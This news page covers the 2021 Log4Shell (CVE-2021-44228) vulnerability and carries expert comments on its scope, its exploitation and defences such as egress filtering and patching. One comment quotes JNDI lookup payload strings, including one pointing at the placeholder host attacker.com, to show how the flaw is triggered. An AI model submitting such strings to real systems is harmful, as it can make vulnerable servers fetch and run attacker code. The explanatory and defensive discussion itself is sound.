News recently broke of a vulnerability affecting digital systems across the internet, leaving them exposed to account takeover by hackers. In fact, threat actors are already attempting to exploit the vulnerability and researchers are warning of serious repercussions worldwide. The problem lies in Log4j, a ubiquitous, open-source Apache logging framework that developers use to keep a record of activity within an application. The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open-source Log4j logging utility is immense and includes some of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu.

Subscribe
Notify of
guest
15 Expert Comments
Most Voted
Newest Oldest
Inline Feedbacks
View all comments
Tim Mackey
Tim Mackey , Principal Security Strategist, Synopsys CyRC (Cybersecurity Research Center)
InfoSec Expert
December 13, 2021 10:56 am

<p>Apache log4j is the de-facto way Java applications write their log information. This means that a very large number of applications are potentially impacted by CVE-2021-44228, and we’ve already seen reports of just how easy it is to trigger the exploit. That’s the worrisome aspect of most zero-day vulnerabilities – that it’s easy to trigger and impacts a ubiquitous piece of software. In this case, exploit of CVE-2021-44228 can allow remote code to be executed, and while that’s problematic enough, the reality is there are likely other potential outcomes from an exploit – we just haven’t seen them or heard them reported. That’s because vulnerability disclosure isn’t a point in time activity. Instead, the disclosure serves as a trigger for security researchers and attackers alike to identify what other potential weaknesses the impacted code might have.</p>
<p>Protecting against exposure to CVE-2021-44228 starts with a basic element of software supply chain risk management – know the code that powers your business. If you don’t know which applications run Java and have a vulnerable version of log4j, then you can’t guarantee you’ve patched everything. If you’re relying on periodic scans of software or configurations to determine whether you’re exposed to something, then it’s time to start looking at continuous monitoring for software supply chain issues and possibly implementing automated pen-testing capabilities. After all, it’s always possible for a vulnerable version of something that should’ve been patched to be used elsewhere or by a different supplier.</p>

Last edited 6 months ago by Tim Mackey
Kayla Underkoffler
Kayla Underkoffler , Senior Security Technologist
InfoSec Expert
December 13, 2021 11:07 am

<p>This Zero Day highlights the threat that open source software presents as a growing portion of the world’s critical supply chain attack surfaces. Open source software is behind nearly all modern digital infrastructure, with the average application using 528 different open source components. The majority of high risk open source vulnerabilities discovered in 2020 have also existed in code for more than two years and most organizations lack direct control over open source software within supply chains to easily fix these weaknesses. Securing this often poorly funded software is an imperative for any organization that relies on it. This is why the Internet Bug Bounty was created; it’s mission is to secure open source by pooling funding from business partners to incentivize the discovery and reporting of vulnerabilities to open source software projects before they’re exploited. Organizations benefit by being able to have some control over increasing the security of open source by funding the research.</p>

Last edited 6 months ago by Kayla Underkoffler
Brian Fox
Brian Fox , CTO and co-founder
InfoSec Expert
December 13, 2021 11:15 am

<p>This new Log4j vulnerability is likely going to be another “flashbulb memory” event in the timeline of significant vulnerabilities. It is the most widely used logging framework in the Java ecosystem. The scope of affected applications is comparable to the 2015 commons-collection vulnerability (CVE 2015-7501) because attackers can safely assume targets likely have this on the classpath. The impact is comparable to previous Struts vulnerabilities, like the one that impacted Equifax, because the attacks can be done remotely, anonymously without login credentials, and leads to a remote exploit. The combination of scope and potential impact here is unlike any previous component vulnerability I can readily recall.</p>

Last edited 6 months ago by Brian Fox
Andrew Howard
InfoSec Expert
December 15, 2021 9:17 am

<p>Through the recently discovered Log4Shell vulnerability, organizations can learn a lot about both vulnerability management in general and the need for secure application development more specifically. </p>
<p>The main problem is not that the Log4j library comes from an open source project run by only one or two programmers as a part-time project. In fact, a similar number of zero-day gaps can be found in commercial software as in open source solutions. The real problem is a lack of security awareness on the part of programmers and companies, which is still prevalent in many cases. </p>
<p>The vulnerability highlights that developers often blindly use libraries without carefully considering all available options. A security-conscious developer would probably have disabled the JNDI query when reading the documentation if the software does not use this feature, thus reducing the attack surface. </p>
<p>I recommend that organizations maintain a repository of libraries that are deemed secure as part of a secure DevOps process and as part of the fundamental IT security strategy of the company. The standard for all development processes then includes programmers continuously checking all libraries used in a software development project for acceptability against this repository.</p>

Last edited 6 months ago by Andrew Howard
Ryan Weeks
Ryan Weeks , CISO
InfoSec Expert
December 15, 2021 9:19 am

<p><a href=\"https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report&source=gmail&ust=1639645469785000&usg=AOvVaw2QJWOPH1cmLdXxexYM1Jy0\">78%</a> of MSPs report attacks against their client SMBs in the last two years alone. With that alarming stat, Datto believes we have a responsibility to identify and communicate known vulnerabilities while arming our MSP partners with the tools required to combat them. </p>
<p>In light of the Log4j vulnerability, Datto created and is offering at no charge to Datto RMM partners, the Log4Shell Enumeration, Mitigation, and Attack Detection tool. The tool can be used to scan all JAR files on the system for signs of vulnerabilities, search TXT and LOG files on a system for a potential attack, and automatically inoculate against any future exploit attempts. Additionally, Datto has also made a script for window systems available to the general public that can be used in conjunction with any RMM solution to enumerate vulnerabilities, detect potential attacks, and aid in temporary inoculation.</p>

Last edited 6 months ago by Ryan Weeks
Saryu Nayyar
Saryu Nayyar , CEO
InfoSec Expert
December 15, 2021 9:35 am

<p>Making the rounds along with COVID over the weekend was the so-called Log4Shell vulnerability, named for the Apache Log4Shell logging utility. Exploiting it is insidiously easy – just send a malicious string to the log. Once logged, it can execute arbitrary commands.</p>
<p>We like to think of logging as part of the IT lifeblood, because it provides critical information on the health and operation of our systems and networks. To think that logs can be compromised in this way has to be disconcerting. We need to treat our utilities like logging software as critical pieces of infrastructure and monitor them just as we monitor networks and applications.</p>

Last edited 6 months ago by Saryu Nayyar
Garret F. Grajek
InfoSec Expert
December 15, 2021 9:37 am

<p>The industry should applaud CyberReason for their mitigation gift to the community. Flaws like Log4Shell are intimidating and could be overwhelming for many overloaded security groups. The attack\’s ability to circumvent the most important part of a Apache web site – the identity establishment page – it’s a exasperating event for those charged with establishing and maintaining integrity and security to our sites. That is why the industry, like the CyberReason example, must pull together and provide the tools for fee and for free when needed to combat the constant threat to our internet systems that the world, as the Carolina Pipeline showed, so deeply depends.</p>

Last edited 6 months ago by Garret F. Grajek
Reuven Harrison
InfoSec Expert
December 15, 2021 9:45 am

<p>The exploit, like many others, relies on a call-home step to a command-and-control (C2) server.</p>
<p>To prevent these kinds of attacks, organizations should restrict egress (outbound) connectivity. Each subnet, server and workload should be allowed to connect only to the endpoints that are required by business. All other destinations should be blocked.</p>
<p>Blocking egress connections is easy with standard security controls such as firewalls, but defining the policy, which egress connections are allowed, is tough. Doing this properly requires continuous learning of legitimate application connectivity patterns, and enforcement in production environments.</p>

Last edited 6 months ago by Reuven Harrison
Erka Koivunen
Erka Koivunen , Chief Information Security Officer
InfoSec Expert
December 15, 2021 9:50 am

<p>It\’s a design failure of catastrophic proportions. All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j. In the simplest terms, it allows an attacker to cause the target system to fetch and run code from a remote location controlled by the attacker. The second stage – what the downloaded malicious code does next – is fully up to the attacker.<u></u> <u></u></p>
<p>Please don’t change your Tesla or iPhone name into ${jndi:ldap://url/a} unless you want unexpected user experience,” he says, half-jokingly.<u></u> <u></u></p>
<p>Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of the phrase like “${jndi:ldap://<a href=\"http://attacker.com/pwnyourserver\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://attacker.com/pwnyourserver7D&source=gmail&ust=1639645469780000&usg=AOvVaw2OTM2d0O3aft_e12rbFGAr\">attacker.com/<wbr />pwnyourserver}</a>” in a Minecraft chat, for instance, could set off a security firestorm at Microsoft in an unpatched system.</p>

Last edited 6 months ago by Erka Koivunen
Asad Ali
Asad Ali , Senior Director, Global Center of Excellence
InfoSec Expert
December 16, 2021 11:08 am

<p>Time is of the essence to mitigate the Log4Shell vulnerability in the Apache log4j 2 library. Given that this vulnerability allows a malicious attacker to execute any command on a vulnerable Java process, it’s crucial to prioritize fixing it in Java processes that are accessible directly from a browser, mobile device, or application programming interface (or API) call.</p>

Last edited 6 months ago by Asad Ali
Charles Carmakal
Charles Carmakal , SVP and CTO
InfoSec Expert
December 16, 2021 11:45 am

<p><span style=\"font-family: Arial;\">CVE-2021-44228 is one of the most pervasive security vulnerabilities that organizations have had to deal with over the past decade. Organizations are challenged with identifying all of the vulnerable Log4j instances across their enterprise. Patching isn\’t trivial. Many vendors are still determining whether their software uses Log4j, as organizations eagerly wait to know if they should apply emergency patches. Closed box systems, vendor-managed systems, and software that\’s no longer maintained (but still running in test or even production environments) adds to the complexity and pain.<br /><br />Organizations need to think about several key things as they work to tackle this problem:<br />1. They need to discover the systems and applications that use Log4j (which may include secondary and tertiary systems that data is passed to).<br />2. They need to apply patches where they can. <br />3. They need to anticipate that they may never find all vulnerable instances, so they should apply mitigations across the enterprise to reduce the exploitability and impact of attempts.<br />4. They need to assess/manage the risk of their vendors and partners.<br />5. They need to determine if instances have already been exploited and then investigate it accordingly.<br /><br />The slightly positive news is that most exploitation observed so far is automated in nature, which means responses and investigations will be relatively easier. But there\’s so much noise right now – and separating the noise from the deliberate and targeted intrusions can be difficult.</span></p>

Last edited 6 months ago by Charles Carmakal
Nicholas Luedtke
Nicholas Luedtke , Principal Analyst
InfoSec Expert
December 16, 2021 12:09 pm

<p>Log4j is a library that is built into the logging functionality of a very large part of the internet. It is embedded/used by a ton of software that run websites, clouds, security services, games, etc… Because logs are important for security, debugging, and audit trails, it is very common for some part of user controlled data to go directly into log files. Those two aspects, coupled by the trivial nature of exploitation of this vulnerability make it very serious.</p>
<p>Attackers only need to find a vector by which they can cause a crafted string to be inserted into a logfile of a vulnerable system. Once they have achieved that, the impacts to an enterprise can be wide. Obviously they could gain a foothold on the victim’s network; that foothold may be privileged if the product that was compromised was an administrative or security component. They can also leak environment variables from the compromised systems which can lead credentials being leaked (if they are stored in an environment variable). Additionally, because of the embedded nature of this library into other software, as a consumer, it is very difficult to tell what products you have in your environment that might be using it. If you can’t do that first task quickly or completely, mitigation becomes very difficult.</p>

Last edited 6 months ago by Nicholas Luedtke
Jeff Williams
Jeff Williams , CTO and Co-founder
InfoSec Expert
December 16, 2021 12:31 pm

<ol>
<li><strong>Make sure that your security operations center is actioning every single alert on the devices that fall into the category above:</strong> “There are a wide range of methods hackers can use to access personal information through Log4j’s vulnerability. The human effort required to detect and action each event is simply unrealistic.”</li>
<li><strong>Install a web application firewall (WAF) with rules that automatically update, so that your SOC can concentrate on fewer alerts:</strong> “Firewalls aren’t going to stop hackers. They still have plenty of other ways to break into organizations’ systems through Log4j, which are undetectable by the firewall. This includes malicious code embedded into JSON, XML, and other common data structures that power nearly every website and application.”</li>
<li><strong>Enumerate any external facing devices that have Log4j installed:</strong> “The focus on ‘external facing’ devices is a mistake, as many internal systems also log data that originated from an untrusted source.”</li>
</ol>

Last edited 6 months ago by Jeff Williams
Joel Belafa
Joel Belafa , Director of Engineering Business Solutions
InfoSec Expert
December 20, 2021 12:10 pm

<p>The Log4Shell data breach is making a considerable industry impact as the attack opens doors to every other type of possible cyber threat. If the attack isn’t contained as soon as possible, there is a risk of wider implications. We therefore need to be prepared for multiple waves of attacks. </p>
<p>To exploit Log4shell, you only need a basic understanding of Java technology. So, in theory, there are seven million people capable of performing such an attack. The scale of this attack is also unpredictable as the effort-to-benefits ratio of Log4shell is unprecedented. We could safely assume that many organisations already have their systems compromised by malware or attacks that are yet to be identified.  </p>
<p>What this attack does highlight is the industry’s demand for new AI-driven ways to fight against cyberattacks by bringing machine learning to Web application firewalls. One of the scenarios commonly worked on is anomaly detection on logs at scale. However, even the companies that invested in modernising their log analytics still have a way to go in battling such sophisticated attacks.  </p>
<p>Any breach stemming from Log4shell (or similar) will still require teams to reprovision and reinstall every affected environment, and to drive a full investigation into all affected systems. At present, the method to contain such an attack requires a high level of tools and automation that are typically reserved for cyber defence pure players. Companies need to level up and engage with sophisticated AI tools to bolster their cybersecurity defences.</p>

Last edited 6 months ago by Joel Belafa
Anurag Gurtu
Anurag Gurtu , CPO
InfoSec Expert
December 20, 2021 12:15 pm

<p>Are we witnessing a match made in heaven? Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability. It\’s the Khonsari ransomware gang who has built an attack using C# and the .NET framework. </p>
<p>After execution, the malware enumerates all mounted drives (other than C:/) and targets user directories including Documents, Videos, Pictures, Downloads, and Desktop. An AES 128 CBC algorithm is used for encryption, and the files are saved with a .khonsari extension.</p>
<p>There are no signs that the Log4Shell vulnerability is slowing down, in fact a second CVE (CVE-2021-45046) just got announced. In the second and third stages, threat actors are aggressively deploying malware families. Among them are Kinsing, XMR, and Mirai. Additionally, some coin-miners and CobaltStrike beacons have been observed in the wild. Nearly 2000 malicious IOCs have been observed so far, which require immediate attention.</p>

Last edited 6 months ago by Anurag Gurtu
Information Security Buzz
15
0
Would love your thoughts, please comment.x
()
x